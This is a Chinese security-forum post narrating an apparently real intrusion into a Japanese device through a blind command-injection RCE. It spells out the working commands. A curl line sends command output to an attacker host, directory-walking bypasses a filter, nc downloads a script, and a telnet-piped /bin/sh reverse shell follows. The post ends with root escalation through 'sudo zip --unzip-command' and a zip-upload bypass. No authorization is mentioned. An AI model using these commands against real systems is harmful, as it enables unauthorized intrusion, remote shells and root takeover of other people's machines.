问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
【Web实战】一次有趣的RCEbypass
在对某樱花国渗透的时候发现一个RCE,经过多次测试后成功绕过限制拿到shell
在跟朋友一起渗透的时候发现个RCE 无回显,使用curl进行测试 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-14df209ed1951c1551e4c96a627a75743bd0bbf7.png) 大哥服务器上有个接受参数回显的脚本,启动并监听 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-ca9b9aa7e19620401b370026a56999f398371797.png) 成功接收到该回显 time=`curl x.x.x.x -d "c=$(id)"` ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-7b70793e41bc0338082abf6cc6938c90446922eb.png) 尝试写入测试,失败 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-2233aeed75ba4cdefea2cbaba0123c3cc979f242.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-c1d8fb27d3b834da776a2379b8cf3c06e3644115.png) 尝试远程下载wget,powershell上线等方式,均失败 使用cat读取代码 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-036147204433634b7e33740d758868a31905211f.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-36ea33b31b950d856b659b3e3c712889f8b3cdca.png) 简单说下代码,接受post的time参数,将T替换成空格,将/替换成-,然后把过滤过的参数放进SystemSetting\_setLocalTime函数当中 跟进函数,接收参数后拼接到$cmd\_date\_set中 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-d5b8f3bcc1c84c120e6115a80a8ee7f2fffed983.png) 然后在48行中过滤掉|,然后拼接到exec中进行命令执行,其中|符号用不了,可以使用反引号来代替拼接 所以我们现在知道了屏蔽了 / | \\ 三个符号 梳理下思路,一般利用方式因为 /的原因,所以用不了http协议,无法尝试远程下载等方式,没有权限进行写入文件,那么现在几种方式进行bypass,第一种,替换/|\\符号,比如常见的空格符$IFS替换,第二种,进行提权写入文件,第三种,想办法再挖一个其他漏洞进行组合利用,第四种,尝试在其他目录写文件执行 那么先查看有哪些命令可用 使用compgen -c没有回显,echo $PATH只返回个H,最后使用busybox进行输出测试 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-c31a4aed478db46cbb5fa96d86192a2636ef811e.png) 常用的思路到这卡住了,尝试使用进行读取某一个字符并输出到当前目录,但发现该方法也无效,没有生成成功output.txt dd if=1 bs=1 skip=9 count=1 status=none of=output.txt ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-3a54df1c078fb1f909fc03c9c1cd55af7f515c2a.png) 继续想办法,虽然限制了/不能进行 cd ../..等,但是正常的cd ..是可以使用的 使用命令 cd ..; cd ..; cd ..; cd ..; cd tmp; nc x.x.x.x 81 > 1.sh 发现是可以成功的 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-59bffaae434e9306b1cb86436f8eb95361291efb.png) 经过测试,成功步骤如下 以下简称服务端,其中被控端为目标设备 1 服务端启用nc监听,并在被控端中写入命令 被控端:cd ..; cd ..; cd ..; cd ..; cd tmp; nc x.x.x.x 81 > 1.sh 服务端:sudo nc -lvvnp 85 2 服务端写命令 telnet x.x.x.x 82 | /bin/sh | telnet x.x.x.x 83 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-26ce70f62e2890b36b479895e31cea6c6506ec2b.png) 回车后打开burp 3 被控端写命令 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-97f091033ac7d52194f876267c15748b49ef83a5.png) time=`curl x.x.x.x -d "c=$(cd ..; cd ..; cd ..; cd ..; cd tmp; nc x.x.x.x 85 > 1.sh)"` 4 发包,发现成功写入1.sh ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-9123bf259afc13b76fd4d508c748847906ed6b7c.png) 5 监听82,83端口 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-7b7fb4de83399aae66da4bb7689c32b182b57a01.png) 并发包 time=`cd ..; cd ..; cd ..; cd ..; cd tmp;sh 1.sh` ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-c896382f7ace0b2e098f6caa67b58cf927d7b1b0.png) 6 至此成功拿到shell ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-fa41540f1e080afdb330c64de5e77b93da3d9e64.png) 7 进行提权 其中/etc/sudoers 设置了nobody可以使用sudo不需要输入密码的命令 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-46ac177c5f71dc3d400977b9463acc4e014d595d.png) 又因为/usr/bin/zip 有一个参数--unzip-command可以执行命令 所以使用以下命令就可以直接进行提权 sudo /usr/bin/zip 1aca.zip /etc/passwd -T --unzip-command="sh -c /bin/sh" ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-1a2067fc72248f150eadee27829b134bb7864827.png) 拿到root权限 第二种方法,根据文件代码,发现一个上传点如下 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-aad8389f36869ab4e0fc8baafc7d1ab1f46cf4ec.png) 其中路径为/svr/www,没有到网站目录/www/,那么利用方法就是上传一个文件,在使用rce进行执行拿到shell,在34行有个简单的判断是否为zip格式文件,但是并没有限制后缀名等条件 简单写个poc ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-dd40dba9ae2a623b487a09a192444e94a32ae190.png) 其中写入的内容如下 sudo /usr/bin/zip 1aca.zip /etc/syslog.conf -T --unzip-command="sh -c 'id > /tmp/test.txt'" ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-444d3704604e8f3c5795f5016d70fb71895501d1.png) 上传成功后跟之前的利用思路一样,跨目录进行读取 ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-417ffd3cc38f7569e4c02f579d1044a554b648a6.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-b7b182e07eef5f3222d613b20bbe5f2c98d353f2.png) ![image.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-7c4ab50e7a70b9f1a037482e358f0ccbdc102bc3.png) 圆满成功!感谢@昭通早行网络科技有限公司的各位师傅不吝赐教!!! 文章有错误请联系我 微信 zacaq999
发表于 2023-11-17 10:00:01
阅读 ( 4827 )
分类:
WEB安全
3 推荐
收藏
0 条评论
请先
登录
后评论
ZAC安全
5 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!